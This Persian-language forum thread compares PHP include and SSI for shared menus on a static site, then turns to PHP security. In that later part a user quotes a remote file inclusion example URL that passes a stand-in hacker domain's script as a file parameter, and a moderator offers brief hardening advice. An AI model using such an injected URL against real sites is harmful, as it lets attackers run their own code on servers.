• پایان فعالیت بخشهای انجمن: امکان ایجاد موضوع یا نوشته جدید برای عموم کاربران غیرفعال شده است

مقايسه php يا shtml

Saeedm

کاربر تازه وارد
تاریخ عضویت
6 آپریل 2005
نوشته‌ها
95
لایک‌ها
0
سلام
براي طراحي يك سايت استاتيك داراي تعداد زيادي صفحه ميخوام قسمت منوها و تبليغات رو تو دو فايل مجزا داشته باشم.
براي include كردن اين 2 فايل (منو و تبليغات) ميتونم از php يا shtml استفاده كنم.
نمونه هاشو ساختم ولي نميدونم كدوم سريعتر هست. هر دو جواب كارم رو مي دن...
از اونجايي كه سروري كه سايت من روش قرار ميگيره سلرون با رم پايين هست ميخواستم بدونم كدوم يكي كمتر به سرور فشار وارد مي كنه (فكر مي كنم بيشترين مشكل رم باشه)
از اساتيد كسي مقايسه اي از اين 2 نداره؟
 

nendoke

کاربر تازه وارد
تاریخ عضویت
31 آگوست 2003
نوشته‌ها
425
لایک‌ها
9
سن
39
محل سکونت
Some Where in Moon !
فکر کنم php بهتر باشه , مخصوصا اگه سرور Zend هم داشته باشه .
 

Azemati

کاربر فعال
کاربر قدیمی پرشین تولز
تاریخ عضویت
18 فوریه 2003
نوشته‌ها
3,366
لایک‌ها
4
محل سکونت
wp-config.php
به نقل از Saeedm :
سلام
براي طراحي يك سايت استاتيك داراي تعداد زيادي صفحه ميخوام قسمت منوها و تبليغات رو تو دو فايل مجزا داشته باشم.
براي include كردن اين 2 فايل (منو و تبليغات) ميتونم از php يا shtml استفاده كنم.
نمونه هاشو ساختم ولي نميدونم كدوم سريعتر هست. هر دو جواب كارم رو مي دن...
از اونجايي كه سروري كه سايت من روش قرار ميگيره سلرون با رم پايين هست ميخواستم بدونم كدوم يكي كمتر به سرور فشار وارد مي كنه (فكر مي كنم بيشترين مشكل رم باشه)
از اساتيد كسي مقايسه اي از اين 2 نداره؟
حدس می‌زنم php فشار کمتری بیاره به سرور. دقیق نمی‌دونم!

من هم کلا php رو بیشتر توصیه می‌کنم. چون دست آدم بازتره ( برای بعدش )
 

Saeedm

کاربر تازه وارد
تاریخ عضویت
6 آپریل 2005
نوشته‌ها
95
لایک‌ها
0
به نقل از azemati :
حدس می‌زنم php فشار کمتری بیاره به سرور. دقیق نمی‌دونم!

من هم کلا php رو بیشتر توصیه می‌کنم. چون دست آدم بازتره ( برای بعدش )
در مورد اينكه دست آدم بازتره كاملا درست ميگيد. ولي تصور من اين بود چون امكانات php زياده ممكنه فشار بيشتري به سرور بياره
چطور مي تونم سرعت لود شدن اين 2 رو چك كنم؟ روشي سراغ داريد؟ فعلا به پيشنهاد مشتري بايد چيزي تحويل بدم كه كمترين فضا رو بخواد و كمترين فشار رو به سيستم تحميل كنه! اگه به خودم بود چشم بسته php رو انتخاب مي كردم.
 

Saeedm

کاربر تازه وارد
تاریخ عضویت
6 آپریل 2005
نوشته‌ها
95
لایک‌ها
0
به نقل از nendoke :
فکر کنم php بهتر باشه , مخصوصا اگه سرور Zend هم داشته باشه .
با
کد:
<? phpinfo(-1) ?>
چك كردم.
Zend Engine v1.3.0 رو داره.
ولي نمي دونم چرا هيچ جا در مورد advantage/disadvantage يا مقايسه بين اينكلود كردن فايل
با اين 2 تا روش پيدا نميشه
 

Saeedm

کاربر تازه وارد
تاریخ عضویت
6 آپریل 2005
نوشته‌ها
95
لایک‌ها
0
به نقل از azemati :
پسر ترسوندي منو :lol: با اين حرفايي كه اون آقاي Atomic-Design ميزنه موافقي؟ (تو لينك اولت) تا حالا مورد مشابه ديدي؟

اون جريان
کد:
http://www.yourdomain.com/yourfile.php?file=http://www.hackersdomain.com/hackingfile.php
و قضيه آورفلو شدن سرور يا پاك شدن فايل رو با اين روش اولين بار بود ميشنيدم!
سوالي كه برام پيش اومد اين بود كه اين آقايون هكر چطوري ميخوان بفهمند كه ما از چه پارامتر
کد:
$filename
براي اسم فايل استفاده كرديم كه بتونند با اون نفوذ كنند؟ من تا الان فكر مي كردم و مي كنم كه دسترسي به كدهاي برنامه هاي server side مثل php به هيچ وجهي امكان نداره! اگه اينطور باشه كه security كارايي كه با php و mysql مي كنيم رو هواس! :eek:
 

Saeedm

کاربر تازه وارد
تاریخ عضویت
6 آپریل 2005
نوشته‌ها
95
لایک‌ها
0
به نقل از azemati :
تو لينك دومت آقاي lammert دقيقا چيزي رو گفت كه من قبلا تصور مي كردم
کد:
so from the user side there is no difference between the SSI and PHP include. One difference is, that SSI is parsed faster than PHP in most implementations - especially if PHP is a CGI addon and not directly compiled in the httpd server - so on a heavy loaded server you might see a slight performance increase, although this is hardly mentionable on todays fast processors.

به اين احوالات من SSI رو انتخاب كردم..
ولي پست قبلي من رو حتما بخون و جواب بده... كلي از كاراي قبلي من ممكنه زير سوال بره!
این لینک رو الان پیدا کردم:
http://ironbark.bendigo.latrobe.edu.au/subjects/WE/lectures/w05.d/Lect09.html
و از روی اون این لینک رو
http://ironbark.bendigo.latrobe.edu.au/subjects/WE/lectures/
به نظرم مطالبش مختصر و مفید باشه به یه بار نگاه کردن می ارزه
راستي يادم رفت بگم: ممنون و متشكرم ;)
 

Azemati

کاربر فعال
کاربر قدیمی پرشین تولز
تاریخ عضویت
18 فوریه 2003
نوشته‌ها
3,366
لایک‌ها
4
محل سکونت
wp-config.php
به نقل از Saeedm :
پسر ترسوندي منو :lol: با اين حرفايي كه اون آقاي Atomic-Design ميزنه موافقي؟ (تو لينك اولت) تا حالا مورد مشابه ديدي؟

اون جريان
کد:
http://www.yourdomain.com/yourfile.php?file=http://www.hackersdomain.com/hackingfile.php
و قضيه آورفلو شدن سرور يا پاك شدن فايل رو با اين روش اولين بار بود ميشنيدم!
سوالي كه برام پيش اومد اين بود كه اين آقايون هكر چطوري ميخوان بفهمند كه ما از چه پارامتر
کد:
$filename
براي اسم فايل استفاده كرديم كه بتونند با اون نفوذ كنند؟ من تا الان فكر مي كردم و مي كنم كه دسترسي به كدهاي برنامه هاي server side مثل php به هيچ وجهي امكان نداره! اگه اينطور باشه كه security كارايي كه با php و mysql مي كنيم رو هواس! :eek:
راستش من چيز زيادي از Php سرم نمي‌شه. ولي تا اونجايي كه مي‌دونم دسترسي به كدهاي برنامه هاي php امكان نداره!
حالا باز بذار اساتيد php بيان نظر بدن!
 

Azemati

کاربر فعال
کاربر قدیمی پرشین تولز
تاریخ عضویت
18 فوریه 2003
نوشته‌ها
3,366
لایک‌ها
4
محل سکونت
wp-config.php
اوه اوه!
چرا سوالت رو توي اين بخش ( بخش HTML پرسيدي! ) بايد در قسمت php & Mysql مي‌پرسيدي. الان هم از مدير بخواه كه سوالت رو به اونجا منتقل كنه يا اينكه برو اونجا يك تاپيك باز كن و لينك اينجا رو بده تا بر و بچز php كار هم بخونن اينو!
 

Saeedm

کاربر تازه وارد
تاریخ عضویت
6 آپریل 2005
نوشته‌ها
95
لایک‌ها
0
به نقل از azemati :
اوه اوه!
چرا سوالت رو توي اين بخش ( بخش HTML پرسيدي! ) بايد در قسمت php & Mysql مي‌پرسيدي. الان هم از مدير بخواه كه سوالت رو به اونجا منتقل كنه يا اينكه برو اونجا يك تاپيك باز كن و لينك اينجا رو بده تا بر و بچز php كار هم بخونن اينو!
والله قرار نبود بحث بره رو امنيت php! يهو اينطوري شد
چون بحث تفاوتهاي include كردن تو 2 تا روش مختلف و در يك سايت استاتيك بود موضوع رو اينجا (مديريت صفحات استاتيك) گذاشتم... به هر حال ممنون...
 

knowhow

مدیران قدیمی
تاریخ عضویت
25 دسامبر 2002
نوشته‌ها
3,478
لایک‌ها
22
ببین لگه Permission های فایلهات درست باشه و تنظیمات Php.ini برای safe mode و register globals درست تنظیم شده باشه و ضمنا کدت هم مشکلی نداشته باشه از نظر امنیتی هیچ خطری تهدیدت نمی کنه.
تمام مواردی که بالا گفتم امروزه توی 90% سرورها اعمال می شه و جای هیچ نگرانی نداره.
 

Saeedm

کاربر تازه وارد
تاریخ عضویت
6 آپریل 2005
نوشته‌ها
95
لایک‌ها
0
به نقل از knowhow :
ببین لگه Permission های فایلهات درست باشه و تنظیمات Php.ini برای safe mode و register globals درست تنظیم شده باشه و ضمنا کدت هم مشکلی نداشته باشه از نظر امنیتی هیچ خطری تهدیدت نمی کنه.
تمام مواردی که بالا گفتم امروزه توی 90% سرورها اعمال می شه و جای هیچ نگرانی نداره.
ممنون
ميشه توضيح بيشتر بديد يا يه رفرنس خوب براي تنظيمات Php.ini . چيزي كه من متوجه نشدم اينه كه اين كار رو به چه روشي انجام ميدند. (تو فايلشون چه كدي رو مي نويسند كه خطرناك هست) و يا چرا فقط در مورد include كردن اين مسئله هست و فانكشن هاي ديگه اين مورد رو ندارند؟؟؟
 
بالا